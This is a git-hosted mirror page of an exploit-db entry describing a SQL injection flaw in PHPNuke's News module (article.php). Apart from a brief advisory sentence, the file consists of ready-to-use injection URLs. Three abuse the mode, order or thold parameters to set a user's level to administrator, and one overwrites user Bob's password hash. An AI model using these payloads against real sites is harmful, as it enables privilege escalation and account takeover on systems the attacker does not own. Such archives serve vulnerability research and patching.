bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/22413.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
891 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/7172/info
It has been reported that an input validation error exists in the article.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and gain unauthorized access to user accounts.
if magic_quotes_gpc=OFF :
Change our level (into admin) :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
or
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
or
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
Change the user Bob's password :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*
Reference in a new issue View git blame Copy permalink